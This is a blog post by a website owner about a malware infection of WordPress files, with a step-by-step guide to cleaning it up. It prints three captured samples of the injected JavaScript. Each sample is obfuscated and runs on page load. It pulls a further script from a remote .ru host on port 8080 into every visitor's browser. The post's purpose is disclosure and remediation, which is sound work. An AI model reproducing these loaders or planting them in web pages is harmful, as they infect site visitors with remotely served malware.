As yesterday, I found unknown code at the bottom of each wordpress file (javascript and homepage index files). Furthermore, the Javascript code will load malicious file from other remote servers, which are randomized. It works similar to Gumblar virus, though it has slightly different codes and action.

So far, I’ve found this javascript malicious code with different var value. Nhbk5v835x5dq6, H3qqea3ur6p, and Jqjzlgspz98uxl.

This code will load another malicious script from http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/

<script>/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = document.createElement('script');Jqjzlgspz98uxl.setAttribute('type', 'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src', 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^& (c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$ !(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&/ig, ''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl) ;}} catch(e) {}</script>

This code will load another malicious script from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/

<script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m.&!#g#@o((o^g)(l^$!$)@.&)$eco$#(m#^@.)#@#!#a&b$i#!$#$d^m^h#)$!(-!((!$s)n$&(.@)c^@$o((m!(&.^)(b&!)e@s(@&t@a()r#$#)t))s@#!#)a!l#e#r$(.))&!you!&):)8($0)@$8^#^@0&)$^/!!&w@$(O@^r(^(!d^p^@#)r#e@s^(s&&@@.(^^o^c#@!$)/)&^m$g@(@^o(^o@g@&#$l&&e^))&@-($(m)#)#a)i^l^#.!&^)i!$@^/((!(t&l)!i^v&(&(e()#j^a$&@s(&m$^&(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$c!&^)&/)!m@o@c#&($n)e()&&t)#-^#!c^(n^^n@c&#).)!&!o$m#($/^a$&!@@b&()^o($(u!&#)t^#-#))$e@@)b##a#y&&@.&#(^c&o^^^^m@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script>

This code will load another malicious script from http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/

<script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src', 'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script>

Some of WordPress, Joomla, and Pligg users have reported this problem in several forums. I’ve successfully cleaned this virus from my iPhone blog and ryan-isra.net as well. This tutorial will guide you how to disinfect your WordPress blog from this virus.
It’s very recommended to have Notepad++ application installed in your Windows to make this process easier.
You can download Notepad++ from this link.

1. Login to cPanel (if applicable)
2. Edit the content of index.php in root directory to be any text (i.e. Under Maintenance) to protect your visitors of being infected.
3. Create a zip file of wp-content directory, download it to local computer and extract it.
4. Use search feature and find all javascript files in wp-content folder.

5. Open Notepad++, then select all files in Search Results screen. Drag all files into Notepad++’s window.

6. Press CTRL+H key, paste the javascript malicious code in “Find what” field and leave empty the “Replace with” field.

7. When finished, click File – Save All or simply press CTRL+SHIFT+S key.
8. Repeat the step#4 and change *.js to *index*
9. Repeat the step#8 and change *index* to *default*
10. Remember the path of each file and then re-upload each file to its own path.
11. Get a fresh copy of wordpress, copy wp-admin and wp-includes directories, compress, and upload to your hosting.
12. Replace wp-admin and wp-includes directories in your hosting with the one that you just uploaded.
13. Now, ensure that your computer is clean of virus/keylogger/trojan and then change your cPanel/FTP password.

The process could be simpler if you have never changed/customized any of your wordpress theme/plugins. You could simply re-upload a fresh wordpress installation, themes, plugins.

I am so sleepy, sorry if something is wrong or missing.

- Update -
Please see these comments, some of them may help you better than my post.
Thanks guys.

Related Posts

1. Malicious Javascript Code infected my blogs
2. What is Sitemap? What is Benefits of Sitemap?
3. How-to move wordpress to new server|hosting
4. SMS Verification needed for Gmail Registration

written by Ryan Isra \\ tags: javascript, malicious, security, virus, website, wordpress, www.ryan-isra.net